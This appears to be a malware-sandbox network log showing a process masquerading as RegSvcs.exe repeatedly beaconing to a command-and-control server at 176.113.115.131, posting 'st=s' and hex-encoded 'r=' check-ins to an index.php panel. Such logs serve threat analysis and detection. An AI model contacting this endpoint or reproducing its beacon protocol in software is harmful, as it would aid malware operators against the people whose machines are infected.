                                                    Session ID: 40 | Source IP: 192.168.2.4 | Source Port: 56067 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:33.547056913 CET | Bytes transferred: 160 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Timestamp: Jan 8, 2025 08:43:34.257252932 CET | Bytes transferred: 197 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID: 41 | Source IP: 192.168.2.4 | Source Port: 56083 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:35.766031981 CET | Bytes transferred: 312 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Timestamp: Jan 8, 2025 08:43:36.481360912 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID: 42 | Source IP: 192.168.2.4 | Source Port: 56095 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:38.109870911 CET | Bytes transferred: 160 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Timestamp: Jan 8, 2025 08:43:38.793694973 CET | Bytes transferred: 197 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:38 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID: 43 | Source IP: 192.168.2.4 | Source Port: 56100 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:40.330431938 CET | Bytes transferred: 312 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Timestamp: Jan 8, 2025 08:43:41.037965059 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID: 44 | Source IP: 192.168.2.4 | Source Port: 56101 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:42.671935081 CET | Bytes transferred: 160 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:43.362859011 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


Session ID: 45 | Source IP: 192.168.2.4 | Source Port: 56102 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:43:44.874779940 CET | Bytes transferred: 312 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Timestamp: Jan 8, 2025 08:43:45.574013948 CET | Bytes transferred: 196 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 7 <c><d>0


Session ID: 46 | Source IP: 192.168.2.4 | Source Port: 56103 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:43:47.206691980 CET | Bytes transferred: 160 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Ascii: st=s
Timestamp: Jan 8, 2025 08:43:47.893065929 CET | Bytes transferred: 197 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 8 <c>3<d>0


Session ID: 47 | Source IP: 192.168.2.4 | Source Port: 56104 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:43:49.406824112 CET | Bytes transferred: 312 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Timestamp: Jan 8, 2025 08:43:50.102644920 CET | Bytes transferred: 196 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 7 <c><d>0


Session ID: 48 | Source IP: 192.168.2.4 | Source Port: 56105 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:43:51.734407902 CET | Bytes transferred: 160 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Ascii: st=s
Timestamp: Jan 8, 2025 08:43:52.439913034 CET | Bytes transferred: 197 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 8 <c>3<d>0


Session ID: 49 | Source IP: 192.168.2.4 | Source Port: 56106 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:43:53.954473972 CET | Bytes transferred: 312 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Timestamp: Jan 8, 2025 08:43:54.668608904 CET | Bytes transferred: 196 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 7 <c><d>0


Session ID: 50 | Source IP: 192.168.2.4 | Source Port: 56107 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:43:56.297605038 CET | Bytes transferred: 160 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Ascii: st=s
Timestamp: Jan 8, 2025 08:43:56.983952999 CET | Bytes transferred: 197 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 8 <c>3<d>0


Session ID: 51 | Source IP: 192.168.2.4 | Source Port: 56108 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:43:58.504410028 CET | Bytes transferred: 312 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Timestamp: Jan 8, 2025 08:43:59.203466892 CET | Bytes transferred: 196 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 7 <c><d>0


Session ID: 52 | Source IP: 192.168.2.4 | Source Port: 56109 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:44:00.829441071 CET | Bytes transferred: 160 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Ascii: st=s
Timestamp: Jan 8, 2025 08:44:01.543853998 CET | Bytes transferred: 197 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 8 <c>3<d>0


Session ID: 53 | Source IP: 192.168.2.4 | Source Port: 56110 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:44:03.065023899 CET | Bytes transferred: 312 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Timestamp: Jan 8, 2025 08:44:03.754291058 CET | Bytes transferred: 196 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 7 <c><d>0


Session ID: 54 | Source IP: 192.168.2.4 | Source Port: 56111 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:44:05.391397953 CET | Bytes transferred: 160 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Ascii: st=s
Timestamp: Jan 8, 2025 08:44:06.114204884 CET | Bytes transferred: 197 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 8 <c>3<d>0


Session ID: 55 | Source IP: 192.168.2.4 | Source Port: 56112 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:44:07.625771999 CET | Bytes transferred: 312 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Timestamp: Jan 8, 2025 08:44:08.335683107 CET | Bytes transferred: 196 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 7 <c><d>0


Session ID: 56 | Source IP: 192.168.2.4 | Source Port: 56113 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:44:09.969321012 CET | Bytes transferred: 160 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Ascii: st=s
Timestamp: Jan 8, 2025 08:44:10.667959929 CET | Bytes transferred: 197 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 8 <c>3<d>0


Session ID: 57 | Source IP: 192.168.2.4 | Source Port: 56114 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:44:12.188338041 CET | Bytes transferred: 312 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Timestamp: Jan 8, 2025 08:44:12.903877974 CET | Bytes transferred: 196 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 7 <c><d>0


Session ID: 58 | Source IP: 192.168.2.4 | Source Port: 56115 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:44:14.531332016 CET | Bytes transferred: 160 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Ascii: st=s
Timestamp: Jan 8, 2025 08:44:15.240238905 CET | Bytes transferred: 197 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 8 <c>3<d>0


Session ID: 59 | Source IP: 192.168.2.4 | Source Port: 56116 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:44:16.750243902 CET | Bytes transferred: 312 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Timestamp: Jan 8, 2025 08:44:17.458482027 CET | Bytes transferred: 196 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 7 <c><d>0


Session ID: 60 | Source IP: 192.168.2.4 | Source Port: 56117 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: Jan 8, 2025 08:44:19.097361088 CET | Bytes transferred: 160 | Direction: OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Ascii: st=s
Timestamp: Jan 8, 2025 08:44:19.804025888 CET | Bytes transferred: 197 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 56118 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:21.316484928 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Jan 8, 2025 08:44:22.035444975 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 56119 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:23.672636986 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Jan 8, 2025 08:44:24.375452995 CET | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 56120 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:25.899329901 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Jan 8, 2025 08:44:26.596529007 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 56121 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:28.234433889 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Jan 8, 2025 08:44:28.942631006 CET | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 56122 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:30.456530094 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
Jan 8, 2025 08:44:31.162390947 CET | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:44:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 56123 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 08:44:32.797504902 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
